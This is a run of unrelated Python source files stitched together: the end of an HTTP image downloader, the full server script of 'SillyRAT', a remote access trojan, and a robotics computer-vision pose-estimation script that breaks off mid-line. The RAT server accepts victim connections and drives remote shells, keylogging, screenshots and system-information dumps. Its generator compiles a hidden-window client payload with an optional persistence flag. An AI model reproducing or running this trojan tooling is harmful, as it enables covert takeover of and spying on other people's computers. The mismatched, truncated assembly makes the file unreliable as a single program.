raise exception.SDKImageOperationError(rs=21, msg=output)
else:
# Copy to local file system
LOG.debug("Remote_host not specified, will copy to local server")
try:
shutil.copyfile(source_path, dest_path)
except Exception as err:
msg = ("Export image from %(src)s to local file system"
" %(dest)s failed: %(err)s" %
{'src': source_path,
'dest': dest_path,
'err': six.text_type(err)})
LOG.error(msg)
raise exception.SDKImageOperationError(rs=22,
err=six.text_type(err))
class HTTPBackend(object):
@classmethod
def image_import(cls, image_name, url, target, **kwargs):
import_image = MultiThreadDownloader(image_name, url,
target)
import_image.run()
class MultiThreadDownloader(threading.Thread):
def __init__(self, image_name, url, target):
super(MultiThreadDownloader, self).__init__()
self.url = url
# Set thread number
self.threadnum = 8
r = requests.head(self.url)
# Get the size of the download resource
self.totalsize = int(r.headers['Content-Length'])
self.target = target
def handle_download_errors(func):
@functools.wraps(func)
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as err:
self.fd.close()
msg = ("Download image from http server failed: %s" %
six.text_type(err))
LOG.error(msg)
raise exception.SDKImageOperationError(rs=9,
err=six.text_type(err))
return wrapper
def get_range(self):
ranges = []
offset = int(self.totalsize / self.threadnum)
for i in range(self.threadnum):
if i == self.threadnum - 1:
ranges.append((i * offset, ''))
else:
# Get the process range for each thread
ranges.append((i * offset, (i + 1) * offset))
return ranges
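# Worked example of the range split above: with totalsize=100 bytes and
# threadnum=8, offset = int(100 / 8) = 12 and the ranges are
#     [(0, 12), (12, 24), (24, 36), (36, 48), (48, 60), (60, 72),
#      (72, 84), (84, '')]
# i.e. the last thread downloads from byte 84 to the end of the file.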
def download(self, start, end):
headers = {'Range': 'bytes=%s-%s' % (start, end),
'Accept-Encoding': '*'}
# Get the data
res = requests.get(self.url, headers=headers)
# seek to the right position for writing data
LOG.debug("Downloading file range %s:%s success" % (start, end))
with _LOCK:
self.fd.seek(start)
self.fd.write(res.content)
@handle_download_errors
def run(self):
# open in binary mode because download() writes res.content (bytes)
self.fd = open(self.target, 'wb')
thread_list = []
n = 0
for ran in self.get_range():
start, end = ran
LOG.debug('thread %d start:%s,end:%s' % (n, start, end))
n += 1
# Open thread
thread = threading.Thread(target=self.download, args=(start, end))
thread.start()
thread_list.append(thread)
for i in thread_list:
i.join()
LOG.info('Download %s success' % (self.name))
self.fd.close()
|
server_gbk.py
|
import sys
import os
import socket
import time
import base64
import tabulate
import signal
import subprocess
import argparse
import shutil
import threading
import platform
import PyInstaller.__main__
from datetime import datetime
__LOGO__ = """
____ _ _ _ ____ _ _____
/ ___|(_) | |_ _| _ \\ / \\|_ _|
\\___ \\| | | | | | | |_) | / _ \\ | |
___) | | | | |_| | _ < / ___ \\| |
|____/|_|_|_|\\__, |_| \\_\\/_/ \\_\\_|
|___/
%s v1.0 @hash3liZer/@TheFlash2k
"""
__HELP_OVERALL__ = """usage: python3 sillyray.py command [--help] [--option OPTION]
These are the commands available for usage:
bind Run the Server on machine and establish connections
generate Generate the Payload file for target platform
You can further get help on the available commands by supplying the
'--help' argument. For example: 'python3 sillyrat.py generate --help'
will print the help manual for the generate command
"""
__HELP_BIND__ = """usage: python3 sillyrat.py bind [--address ADDRESS] [--port PORT]
Args Description
-h, --help Show Help for Bind command
-a, --address IP Address to Bind to
-p, --port Port Number on which to Bind
The bind command is used to bind the application on the server
for incoming connections and control the clients through
the command interface
"""
__HELP_GENERATE__ = """
usage: python3 sillyrat.py generate [--address ADDRESS] [--port PORT] [--output OUTPUT]
Args Description
-h, --help Show Help Manual for generate command
-a, --address IP Address of server. [Connect to]
-p, --port Port of connecting server
-o, --output Output file to generate
-s, --source Do not generate compiled code.
Gives Python source file.
--persistence Auto start on reboot [Under Development]
The generate command generates the required payload
file to be executed on the client side. It establishes
a connection to the server and executes commands.
"""
class PULL:
WHITE = '\033[1m\033[0m'
PURPLE = '\033[1m\033[95m'
CYAN = '\033[1m\033[96m'
DARKCYAN = '\033[1m\033[36m'
BLUE = '\033[1m\033[94m'
GREEN = '\033[1m\033[92m'
YELLOW = '\033[1m\033[93m'
RED = '\033[1m\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
LINEUP = '\033[F'
def __init__(self):
if not self.support_colors():
self.win_colors()
def support_colors(self):
plat = sys.platform
supported_platform = plat != 'Pocket PC' and (plat != 'win32' or \
'ANSICON' in os.environ)
is_a_tty = hasattr(sys.stdout, 'isatty') and sys.stdout.isatty()
if not supported_platform or not is_a_tty:
return False
return True
def win_colors(self):
self.WHITE = ''
self.PURPLE = ''
self.CYAN = ''
self.DARKCYAN = ''
self.BLUE = ''
self.GREEN = ''
self.YELLOW = ''
self.RED = ''
self.BOLD = ''
self.UNDERLINE = ''
self.END = ''
def get_com(self, mss=()):
if mss:
rtval = input(self.DARKCYAN + "$" + self.END + " [" + self.GREEN + mss[1].ip + self.END + ":" + self.RED + str(mss[1].port) + self.END + "] ")
else:
rtval = input(self.DARKCYAN + "$" + self.END + " ")
rtval = rtval.rstrip(" ").lstrip(" ")
return rtval
def print(self, mess):
print(self.GREEN + "[" + self.UNDERLINE + "*" + self.END + self.GREEN + "] " + self.END + mess + self.END)
def function(self, mess):
print(self.BLUE + "[" + self.UNDERLINE + ":" + self.END + self.BLUE + "] " + self.END + mess + self.END)
def error(self, mess):
print(self.RED + "[" + self.UNDERLINE + "!" + self.END + self.RED + "] " + self.END + mess + self.END)
def exit(self, mess=""):
sys.exit(self.RED + "[" + self.UNDERLINE + "~" + self.END + self.RED + "] " + self.END + mess + self.END)
def logo(self):
print(self.DARKCYAN + __LOGO__ % self.YELLOW + self.END)
def help_c_current(self):
headers = (pull.BOLD + 'Command' + pull.END, pull.BOLD + 'Description' + pull.END)
lister = [
('help', 'Shows manual for commands'),
('sessions', 'Show all connected clients to the server'),
('connect', 'Connect to a Specific Client'),
('disconnect', 'Disconnect from Current Client'),
('clear', 'Clear Screen'),
('shell' , 'Launch a New Terminal/Shell.'),
('keylogger', 'KeyLogger Module'),
('sysinfo', 'Dump System, Processor, CPU and Network Information'),
('screenshot', 'Take Screenshot on Target Machine and Save on Local'),
('exit', 'Exit from SillyRAT!')
]
sys.stdout.write("\n")
print(tabulate.tabulate(lister, headers=headers))
sys.stdout.write("\n")
def help_c_general(self):
headers = (pull.BOLD + 'Command' + pull.END, pull.BOLD + 'Description' + pull.END)
lister = [
('help', 'Shows manual for commands'),
('sessions', 'Show all connected clients to the server'),
('connect', 'Connect to a Specific Client'),
('disconnect', 'Disconnect from Current Client'),
('clear', 'Clear Screen'),
('exit', 'Exit from SillyRAT!')
]
sys.stdout.write("\n")
print(tabulate.tabulate(lister, headers=headers))
sys.stdout.write("\n")
def help_c_sessions(self):
sys.stdout.write("\n")
print("Info : Display connected sessions to the server!")
print("Arguments : None")
print("Example : \n")
print("$ sessions")
sys.stdout.write("\n")
def help_c_connect(self):
sys.stdout.write("\n")
print("Info : Connect to an available session!")
print("Arguments : Session ID")
print("Example : \n")
print("$ connect 56\n")
headers = (pull.BOLD + 'Argument' + pull.END, pull.BOLD + 'Type' + pull.END, pull.BOLD + 'Description' + pull.END)
lister = [
('ID', 'integer', 'ID of the sessions from the list')
]
print(tabulate.tabulate(lister, headers=headers))
sys.stdout.write("\n")
def help_c_disconnect(self):
sys.stdout.write("\n")
print("Info : Disconnect current session!")
print("Arguments : None")
print("Example : \n")
print("$ disconnect")
sys.stdout.write("\n")
def help_c_clear(self):
sys.stdout.write("\n")
print("Info : Clear screen!")
print("Arguments : None")
print("Example : \n")
print("$ clear")
sys.stdout.write("\n")
def help_c_shell(self):
sys.stdout.write("\n")
print("Info : Launch a shell against client!")
print("Arguments : None")
print("Example : \n")
print("$ shell")
sys.stdout.write("\n")
def help_c_keylogger(self):
sys.stdout.write("\n")
print("Info : Keylogger Module!")
print("Arguments : on, off, dump")
print("Example : \n")
print("$ keylogger on")
print("$ keylogger off")
print("$ keylogger dump\n")
headers = (pull.BOLD + 'Argument' + pull.END, pull.BOLD + 'Description' + pull.END)
lister = [
('on', 'Turn Keylogger on'),
('off', 'Turn Keylogger off'),
('dump', 'Dump keylogs')
]
print(tabulate.tabulate(lister, headers=headers))
sys.stdout.write("\n")
def help_c_sysinfo(self):
sys.stdout.write("\n")
print("Info : Gathers system information!")
print("Arguments : None")
print("Example : \n")
print("$ sysinfo")
sys.stdout.write("\n")
def help_c_screenshot(self):
sys.stdout.write("\n")
print("Info : Screenshot the current screen and save it on server!")
print("Arguments : None")
print("Example : \n")
print("$ screenshot")
sys.stdout.write("\n")
def help_overall(self):
global __HELP_OVERALL__
print(__HELP_OVERALL__)
sys.exit(0)
def help_bind(self):
global __HELP_BIND__
print(__HELP_BIND__)
sys.exit(0)
def help_generate(self):
global __HELP_GENERATE__
print(__HELP_GENERATE__)
sys.exit(0)
pull = PULL()
class CLIENT:
STATUS = "Active"
MESSAGE = ""
KEY = ")J@NcRfU"
def __init__(self, sock, addr):
self.sock = sock
self.ip = addr[0]
self.port = addr[1]
def acceptor(self):
data = ""
chunk = ""
while True:
chunk = self.sock.recv(4096)
print(len(chunk))
if not chunk:
self.STATUS = "Disconnected"
break
data += chunk.decode('gbk')
if self.KEY.encode('gbk') in chunk:
try:
# split on the terminator key instead of rstrip(), which would also
# strip legitimate base64 characters from the end of the payload
self.MESSAGE = base64.decodebytes(data.split(self.KEY)[0].encode('gbk')).decode('gbk')
except UnicodeDecodeError:
self.MESSAGE = base64.decodebytes(data.split(self.KEY)[0].encode('gbk'))
if not self.MESSAGE:
self.MESSAGE = " "
data = ""
def engage(self):
t = threading.Thread(target=self.acceptor)
t.daemon = True
t.start()
def send_data(self, val):
# encode the payload and append the terminator key before sending;
# the leftover XOR/debug experiment that printed every byte has been
# dropped since its result was never sent
bef = base64.encodebytes(val.encode('utf-8')) + self.KEY.encode('utf-8')
self.sock.send(bef)
def recv_data(self):
while not self.MESSAGE:
try:
# sleep briefly to avoid a tight busy-wait while the
# acceptor thread fills in self.MESSAGE
time.sleep(0.1)
except KeyboardInterrupt:
break
rtval = self.MESSAGE
self.MESSAGE = ""
return rtval
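# Sketch of the wire protocol used by this CLIENT class (as implemented
# above, not an external spec): each message on the socket is
#     base64(payload) + KEY
# where KEY (")J@NcRfU") acts as a terminator. acceptor() accumulates
# chunks until the terminator arrives, strips it and base64-decodes the
# payload; send_data() builds the same framing in the other direction.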
class COMMCENTER:
CLIENTS = []
COUNTER = 0
CURRENT = () #### Current Target Client ####
KEYLOGS = []
def c_help(self, vals):
if len(vals) > 1:
if vals[1] == "sessions":
pull.help_c_sessions()
elif vals[1] == "connect":
pull.help_c_connect()
elif vals[1] == "disconnect":
pull.help_c_disconnect()
elif vals[1] == "clear":
pull.help_c_clear()
elif vals[1] == "shell":
pull.help_c_shell()
elif vals[1] == "keylogger":
pull.help_c_keylogger()
elif vals[1] == "sysinfo":
pull.help_c_sysinfo()
elif vals[1] == "screenshot":
pull.help_c_screenshot()
else:
if self.CURRENT:
pull.help_c_current()
else:
pull.help_c_general()
def get_valid(self, _id):
for client in self.CLIENTS:
if client[0] == int(_id):
return client
return False
def c_ping(self, _id):
return
def c_connect(self, args):
if len(args) == 2:
tgt = self.get_valid(args[1])
if tgt:
self.CURRENT = tgt
else:
sys.stdout.write("\n")
pull.error("No client is associated with that ID!")
sys.stdout.write("\n")
else:
sys.stdout.write("\n")
pull.error("Invalid Syntax!")
sys.stdout.write("\n")
def c_disconnect(self):
self.CURRENT = ()
def c_sessions(self):
headers = (pull.BOLD + 'ID' + pull.END, pull.BOLD + 'IP Address' + pull.END, pull.BOLD + 'Incoming Port' + pull.END, pull.BOLD + 'Status' + pull.END)
lister = []
for client in self.CLIENTS:
toappend = []
toappend.append(pull.RED + str(client[0]) + pull.END)
toappend.append(pull.DARKCYAN + client[1].ip + pull.END)
toappend.append(pull.BLUE + str(client[1].port) + pull.END)
toappend.append(pull.GREEN + client[1].STATUS + pull.END)
lister.append(toappend)
sys.stdout.write("\n")
print(tabulate.tabulate(lister, headers=headers))
sys.stdout.write("\n")
def c_shell(self):
result = ""
if self.CURRENT:
sys.stdout.write("\n")
while True:
val = input("# ")
val = "shell:" + val.rstrip(" ").lstrip(" ")
if val:
if val != "shell:exit":
self.CURRENT[1].send_data(val)
result = self.CURRENT[1].recv_data()
if result.strip(" "):
print(result)
else:
break
else:
sys.stdout.write("\n")
pull.error("You need to connect before execute this command!")
sys.stdout.write("\n")
def c_clear(self):
subprocess.call(["clear"], shell=True)
def c_keylogger(self, args):
if self.CURRENT:
if len(args) == 2:
if args[1] == "status":
return
elif args[1] == "on":
self.CURRENT[1].send_data("keylogger:on")
result = self.CURRENT[1].recv_data()
if result.strip(" "):
print(result)
elif args[1] == "off":
self.CURRENT[1].send_data("keylogger:off")
result = self.CURRENT[1].recv_data()
if result.strip(" "):
print(result)
elif args[1] == "dump":
self.CURRENT[1].send_data("keylogger:dump")
result = self.CURRENT[1].recv_data()
dirname = os.path.dirname(__file__)
dirname = os.path.join( dirname, 'keylogs' )
if not os.path.isdir(dirname):
os.mkdir(dirname)
dirname = os.path.join( dirname, '%s' % (self.CURRENT[1].ip) )
if not os.path.isdir(dirname):
os.mkdir(dirname)
fullpath = os.path.join( dirname, datetime.now().strftime("%d-%m-%Y %H:%M:%S.txt") )
fl = open( fullpath, 'w' )
fl.write( result )
fl.close()
pull.print("Dumped: [" + pull.GREEN + fullpath + pull.END + "]")
else:
pull.error("Invalid Syntax!")
else:
pull.error("Invalid Syntax!")
else:
pull.error("You need to connect before execute this command!")
def c_sysinfo(self):
if self.CURRENT:
self.CURRENT[1].send_data("sysinfo:")
result = self.CURRENT[1].recv_data()
if result.strip(" "):
print(result)
else:
pull.error("You need to connect before execute this command!")
def c_screenshot(self):
if self.CURRENT:
self.CURRENT[1].send_data("screenshot:")
result = self.CURRENT[1].recv_data()
dirname = os.path.dirname(__file__)
dirname = os.path.join( dirname, 'screenshots' )
if not os.path.isdir(dirname):
os.mkdir(dirname)
dirname = os.path.join( dirname, '%s' % (self.CURRENT[1].ip) )
if not os.path.isdir(dirname):
os.mkdir(dirname)
fullpath = os.path.join( dirname, datetime.now().strftime("%d-%m-%Y %H:%M:%S.png") )
fl = open( fullpath, 'wb' )
fl.write( result )
fl.close()
pull.print("Saved: [" + pull.DARKCYAN + fullpath + pull.END + "]")
else:
pull.error("You need to connect before execute this command!")
def c_exit(self):
sys.stdout.write("\n")
pull.exit("See Ya!\n")
class INTERFACE(COMMCENTER):
SOCKET = None
RUNNER = True
def __init__(self, prs):
self.address = prs.address
self.port = prs.port
def bind(self):
self.SOCKET = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.SOCKET.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.SOCKET.bind((self.address, self.port))
pull.print("Successfuly Bind to %s%s:%i" % (
pull.RED,
self.address,
self.port,
))
except Exception as e:
print(e)
pull.exit("Unable to bind to %s%s:%i" % (
pull.RED,
self.address,
self.port,
))
def accept_threads(self):
self.SOCKET.listen(10)
while self.RUNNER:
conn, addr = self.SOCKET.accept()
is_valid = True
self.COUNTER += 1
client = CLIENT(conn, addr)
client.engage()
self.CLIENTS.append(
(
self.COUNTER,
client
)
)
def accept(self):
t = threading.Thread(target=self.accept_threads)
t.daemon = True
t.start()
#### Commands ####
def execute(self, vals):
if vals:
if vals[0] == "exit":
self.c_exit()
elif vals[0] == "help":
self.c_help(vals)
elif vals[0] == "sessions":
self.c_sessions()
elif vals[0] == "ping":
self.c_ping(vals)
elif vals[0] == "connect":
self.c_connect(vals)
elif vals[0] == "disconnect":
self.c_disconnect()
elif vals[0] == "shell":
self.c_shell()
elif vals[0] == "clear":
self.c_clear()
elif vals[0] == "keylogger":
self.c_keylogger(vals)
elif vals[0] == "sysinfo":
self.c_sysinfo()
elif vals[0] == "screenshot":
self.c_screenshot()
def launch(self):
pull.print("Launching Interface! Enter 'help' to get avaible commands! \n")
while True:
val = pull.get_com(self.CURRENT)
self.execute(val.split(" "))
def close(self):
self.SOCKET.close()
class GENERATOR:
data = ""
flname = ""
def __init__(self, prs):
self.address = prs.address
self.port = prs.port
self.source = prs.source
self.persistence = prs.persistence
self.output = self.get_output(prs.output)
self.pather = self.get_path()
self.v_imports = self.get_imports()
self.v_consts = self.get_consts()
self.v_persistence = self.get_persistence()
self.v_sysinfo = self.get_sysinfo()
self.v_screenshot = self.get_screenshot()
self.v_client = self.get_client()
self.v_main = self.get_main()
def get_output(self, out):
rtval = ""
if self.source:
if not out.endswith(".py"):
rtval = (out + ".py")
else:
rtval = out
else:
if platform.system() == "Windows":
if not out.endswith(".exe"):
rtval = (out + ".exe")
else:
rtval = out
elif platform.system() == "Linux":
rtval = (out)
else:
pull.exit("Unrecognized Platform")
return rtval
def get_path(self):
dirname = os.path.dirname(__file__)
dirname = os.path.join(dirname, 'mods')
if os.path.isdir(dirname):
return dirname
else:
pull.exit("Files missing to generate the payload!")
def get_imports(self):
topen = os.path.join(self.pather, 'imports.py')
fl = open(topen)
data = fl.read()
fl.close()
return data
def get_consts(self):
data = "CONSTIP = \"%s\"\nCONSTPT = %i" % (self.address, self.port)
return data
def get_persistence(self):
topen = os.path.join(self.pather, "persistence.py")
fl = open(topen)
data = fl.read()
fl.close()
return data
def get_sysinfo(self):
topen = os.path.join(self.pather, 'sysinfo.py')
fl = open(topen)
data = fl.read()
fl.close()
return data
def get_screenshot(self):
topen = os.path.join(self.pather, 'screenshot.py')
fl = open(topen)
data = fl.read()
fl.close()
return data
def get_client(self):
topen = os.path.join(self.pather, 'client.py')
fl = open(topen)
data = fl.read()
fl.close()
return data
def get_main(self):
topen = os.path.join(self.pather, 'main.py')
fl = open(topen)
data = fl.read()
fl.close()
return data
def tmp_dir(self):
dirname = os.path.dirname(__file__)
dirname = os.path.join(dirname, 'tmp')
if not os.path.isdir(dirname):
os.mkdir(dirname)
fname = os.path.join(dirname, 'cl.py')
return (dirname, fname, 'cl.py')
def patch(self):
time.sleep(2)
pull.function("Compiling modules ... ")
self.data = self.v_imports + "\n\n" + self.v_consts + "\n" + self.v_persistence + "\n" + self.v_sysinfo + "\n\n" + \
self.v_screenshot + "\n\n" + self.v_client + "\n\n" + self.v_main
time.sleep(2)
pull.function("Generating source code ...")
fl = open(self.output, 'w')
fl.write(self.data)
fl.close()
time.sleep(2)
pull.print("Code generated successfully!")
pull.print("File: " + self.output)
def generate(self):
time.sleep(2)
pull.function("Compiling modules ... ")
self.data = self.v_imports + "\n\n" + self.v_consts + "\n\n" + self.v_persistence + "\n\n" + self.v_sysinfo + "\n\n" + \
self.v_screenshot + "\n\n" + self.v_client + "\n\n" + self.v_main
time.sleep(2)
pull.function("Generating one time code for binary ")
self.flname = self.tmp_dir()
fl = open(self.flname[1], 'w')
fl.write(self.data)
fl.close()
pull.print("Code generated successfully!")
def compile(self):
pull.function("Compiling generated code /\\")
counter = 1
t = threading.Thread(target=PyInstaller.__main__.run, args=([
'--name=%s' % os.path.basename(self.output),
'--onefile',
'--windowed',
'--log-level=ERROR',
'--distpath=%s' % os.path.dirname(self.output),
'--workpath=%s' % self.flname[0],
os.path.join(self.flname[0], self.flname[2])
],),)
t.daemon = True
t.start()
while t.is_alive():
sys.stdout.write("\r" + pull.BLUE + "[" + pull.UNDERLINE + ":" + pull.END + pull.BLUE + "] " + pull.END + "Elapsed Time: %is" % (counter) + pull.END)
time.sleep(1)
counter += 1
sys.stdout.write("\n")
pull.print("Compiled Successfully!")
def clean(self):
pull.function("Cleaning files and temporary codes")
shutil.rmtree(self.flname[0])
pull.print("File: " + self.output)
class PARSER:
COMMANDS = ['bind', 'generate']
def __init__(self, prs):
self.mode = self.v_mode(prs.mode, prs.help)
self.help = self.v_help(prs.help)
if self.mode == "bind":
self.address = self.v_address(prs.address)
self.port = self.v_port(prs.port)
elif self.mode == "generate":
self.address = self.v_address(prs.address)
self.port = self.v_port(prs.port)
self.output = self.v_output(prs.output)
self.source = prs.source
self.persistence = prs.persistence
def v_help(self, hl):
if hl:
if not self.mode:
pull.help_overall()
else:
if self.mode == "bind":
pull.help_bind()
elif self.mode == "generate":
pull.help_generate()
else:
pull.help_help()
def v_address(self, str):
return str
def v_port(self, port):
if not port:
pull.exit("You need to Supply a Valid Port Number")
if port <= 0 or port > 65535:
pull.exit("Invalid Port Number")
return port
def v_mode(self, val, hl):
if val:
if val in self.COMMANDS:
return val
else:
pull.exit("No such command found in database")
else:
if not hl:
pull.exit("Invalid Syntax. Refer to the manual!")
def v_output(self, val):
if val:
if os.path.isdir(os.path.dirname(val)):
return val
else:
pull.exit("Directory doesn't exist!")
else:
pull.exit("You must provide an output Path!")
def main():
pull.logo()
parser = argparse.ArgumentParser(add_help=False)
    parser.add_argument('mode', nargs="?", help="Mode")
parser.add_argument('-h', '--help' , dest="help" , default=False, action="store_true", help="Help Manual")
parser.add_argument('-a', '--address', dest="address", default="", type=str, help="Address to Bind to")
parser.add_argument('-p', '--port' , dest="port" , default=0 , type=int, help="Port to Bind to")
parser.add_argument('-o', '--output' , dest="output" , default="", type=str, help="Complete Path to Output File!")
parser.add_argument('-s', '--source' , dest="source" , default=False, action="store_true", help="Source file")
parser.add_argument('--persistence' , dest="persistence", default=False, action="store_true", help="Persistence")
parser = parser.parse_args()
parser = PARSER(parser)
if parser.mode == "bind":
iface = INTERFACE(parser)
iface.bind()
iface.accept()
iface.launch()
iface.close()
elif parser.mode == "generate":
pull.function("Starting Generator Mode!")
generator = GENERATOR(parser)
if generator.source:
generator.patch()
else:
generator.generate()
generator.compile()
generator.clean()
pull.function("Done")
if __name__ == "__main__":
main()
|
computerVisionAnimation.py
|
#!/usr/bin/python3
# NOTE: SET THE CAMERA MATRIX CORRECTLY!!
import cv2
import time
import numpy as np
import math
import pickle as pkl
import statistics
from threading import Thread
from computerVisionFunctions import process_image, rotation_vector_list, translation_vector_list, get_contour_corners, \
rotate_contours
# Options: video, realsense, image, prerecorded
INPUT_DEVICE = "prerecorded"
SERVER_IP = "10.28.98.2"
DISPLAY = True
NETWORK_TABLES = False
FRAME_BY_FRAME = False
DEBUG_PRINT = False
CAMERA_ID = 2
VIDEO_NAME = "example.avi"
mtx = None
dist = None
img_org = None
webcam = None
pipeline = None
class WebcamVideoStream:
def __init__(self, src=0, name="WebcamVideoStream"):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
# initialize the thread name
self.name = name
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
t = Thread(target=self.update, name=self.name, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.grabbed, self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
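# Illustrative sketch (never called by this script): how the threaded
# WebcamVideoStream above is typically driven. The device index 0 is a
# hypothetical placeholder; the real source is chosen further down from
# INPUT_DEVICE and CAMERA_ID.
def _example_webcam_stream_usage():
    """Grab a few frames from a background-threaded capture, then stop it."""
    stream = WebcamVideoStream(src=0).start()
    for _ in range(5):
        grabbed, frame = stream.read()
        if grabbed:
            print(frame.shape)
    stream.stop()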
if NETWORK_TABLES:
from networktables import NetworkTables
import logging
logging.basicConfig(level=logging.DEBUG)
NetworkTables.initialize(server=SERVER_IP)
sd = NetworkTables.getTable("SmartDashboard")
if INPUT_DEVICE == "realsense":
# Semi-deprecated
import pyrealsense2 as rs
# Camera pipeline
pipeline = rs.pipeline()
config = rs.config()
config.enable_stream(rs.stream.color, 1280, 720, rs.format.bgr8, 30)
# Start streaming
pipeline.start(config)
def median_of_vector(vector):
list_of_item_1 = []
list_of_item_2 = []
list_of_item_3 = []
for b in vector:
list_of_item_1.append(b[0])
list_of_item_2.append(b[1])
list_of_item_3.append(b[2])
return np.array([statistics.median(list_of_item_1),
statistics.median(list_of_item_2),
statistics.median(list_of_item_3)])
def solve_pnp_code(contours_inp):
# pairs = []
# distances = []
# for cont in contours_inp:
if type(contours_inp) != list:
contours_inp = np.array(contours_inp)
# filtered_contours = contours_inp
filtered_contours = contours_inp
# Rotate, see diagram:
"""
/ -_
/ --__
/ /
/ /
/ /
/___ /
-_____/ < hard to tell where point is exactly
/\__
/ \__
/ \_
/ /
/ /
/ /
\__ /
\____ /
\/ < more angled, and easier to find bottom corner
"""
left, right = get_contour_corners([filtered_contours[0], filtered_contours[1]])
left = np.array(left)
right = np.array(right)
# Rotate points back
left = rotate_contours(-30, left)
right = rotate_contours(30, right)
"""
Points of target in px (300 px per inch)
(413, 0), (996, 149), (0,1599), (584, 1748)
(1.39, 0), (3.32, 0.497), (0, 5.33), (1.943, 5.827)
top left, top right, bottom left, bottom right
(3409, 149), (3992, 0), (3821, 1748), (4405, 1559)
Points in inches
(11.363, 0.479), (13.293, 0), (12.74, 5.827), (14.683, 5.33)
(1.39, 0), (3.32, 0.497), (0, 5.33), (1.943, 5.827), (11.363, 0.479), (13.293, 0), (12.74, 5.827), (14.683, 5.33)
"""
# PS3 camera distortion matrix
# matrix2 = [[515.45484128, 0, 285.10931073], [0, 518.05417133, 281.68350735], [0, 0, 1]]
camera_matrix = np.array(mtx, dtype=np.float32)
# PS3 camera distortion
# distortion = np.array([-0.13552493, 0.05373435, 0.0118757, -0.00876742, 0.16312619], dtype=np.float64)
points = np.array([left, right], dtype=np.float32)
new_points = []
points = np.squeeze(points)
points = np.ndarray.tolist(points)
# Format points
for z in points:
for X in z:
new_points.append(X)
new_points = np.array(new_points, dtype=np.float32)
new_points = np.squeeze(new_points)
image_points = []
for d in new_points:
image_points.append([d])
image_points = np.array(image_points, dtype=np.int32)
'''
objectPoints = [(1.39, 0), (3.32, 0.497), (0, 5.33), (1.943, 5.827), (11.363, 0.479), (13.293, 0),
(12.74, 5.827), (14.683, 5.33)]
'''
# Real world points in inches
# object_points = [(3.32, 0.497), (1.943, 5.827), (11.363, 0.479), (12.74, 5.827)]
# object_points = [(1.39, 0), (0, 5.33), (13.293, 0), (14.683, 5.33)]
object_points = [(13.249681, 0), (14.626771, 5.324812), (1.37709, 0), (0, 5.324812)]
# object_points = np.array([[1.39, 0], [3.32, 0.497], [12.74, 5.827], [14.683, 5.33]])
# objectPoints = np.array([(1.39, 0), (0, 5.53), (13.293, 0), (14.63, 5.33)], dtype=np.float32)
# Format points
object_points = np.array(object_points, dtype=np.float32)
object_points2 = []
# Move (0, 0) to center
for pnt in object_points:
object_points2.append([pnt[0] - (14.683 / 2), pnt[1] - (5.827 / 2)])
object_points = np.array(object_points2, dtype=np.float32)
object_points2 = []
# Add third dimension to points
for y in object_points:
object_points2.append([y[0], y[1], 0])
# objectPoints = np.ascontiguousarray(objectPoints2[:, :3]).reshape((8, 1, 3))
object_points = np.ascontiguousarray(object_points2)
# Highlight points being used
    if DISPLAY and img_org is not None:
        cv2.drawContours(img_org, image_points, -1, (255, 255, 200), 10)
        cv2.imshow("highlighted", img_org)
    debug_print("begin solvepnp")
image_points = np.array(image_points, dtype=np.float32)
# Do solvepnp
# print(image_points)
    # solvePnP returns a success flag followed by the rotation and translation vectors
    success, rotation_vector, translation_vector = cv2.solvePnP(object_points, image_points, camera_matrix, dist)
# print("translation")
# print(translation_vector)
# print("rotation")
# print(rotation_vector)
# Take averages over 5 frames
translation_vector_list.append(translation_vector)
rotation_vector_list.append(rotation_vector)
avg_translation = translation_vector
avg_rotation = rotation_vector
if len(translation_vector_list) > 5:
translation_vector_list.pop(0)
rotation_vector_list.pop(0)
avg_rotation = median_of_vector(rotation_vector_list)
avg_translation = median_of_vector(translation_vector_list)
# for b in rotation_vector_list:
# avg_rotation[0] += b[0] / 5
# avg_rotation[1] += b[1] / 5
# avg_rotation[2] += b[2] / 5
# for b in translation_vector_list:
# avg_translation[0] += b[0] / 5
# avg_translation[1] += b[1] / 5
# avg_translation[2] += b[2] / 5
# avg_rotation = np.array(avg_rotation)
# avg_translation = np.array(avg_translation)
# print("average rotation vector")
# print(np.array(avg_rotation))
# print("average translation vector")
# print(np.array(avg_translation))
return rotation_vector, translation_vector, avg_rotation, avg_translation, image_points
def compute_output_values(rotation_vec, translation_vec):
# Compute the necessary output distance and angles
x = translation_vec[0][0] + 0
z = 0 * translation_vec[1][0] + 1 * translation_vec[2][0]
# distance in the horizontal plane between robot center and target
robot_distance = math.sqrt(x**2 + z**2)
# horizontal angle between robot center line and target
robot_to_target_angle = math.atan2(x, z)
rot, _ = cv2.Rodrigues(rotation_vec)
rot_inv = rot.transpose()
# version if there is not offset for the camera (VERY slightly faster)
# pzero_world = numpy.matmul(rot_inv, -tvec)
# version if camera is offset
pzero_world = np.matmul(rot_inv, 0 - translation_vec)
other_angle = math.atan2(pzero_world[0][0], pzero_world[2][0])
return robot_distance, robot_to_target_angle, other_angle
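# Illustrative sketch (never called by this script): sanity-check
# compute_output_values with a made-up solvePnP result. The pose is
# hypothetical: target 60 in straight ahead of the camera and 12 in below it,
# with a zero rotation vector.
def _example_compute_output_values():
    """Print the distance and angles for a hand-built pose."""
    fake_rotation = np.zeros((3, 1), dtype=np.float64)
    fake_translation = np.array([[0.0], [12.0], [60.0]])
    dist_in, angle1, angle2 = compute_output_values(fake_rotation, fake_translation)
    # Only the x and z components feed the distance, so this prints ~60.0 with
    # a robot-to-target angle of ~0 degrees.
    print(dist_in, math.degrees(angle1), math.degrees(angle2))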
def debug_print(text):
if DEBUG_PRINT:
print(text)
else:
return text
if INPUT_DEVICE == "realsense" or INPUT_DEVICE == "video" or INPUT_DEVICE == "prerecorded":
# Import camera matrix
with open('camera_calibration2.pkl', 'rb') as f:
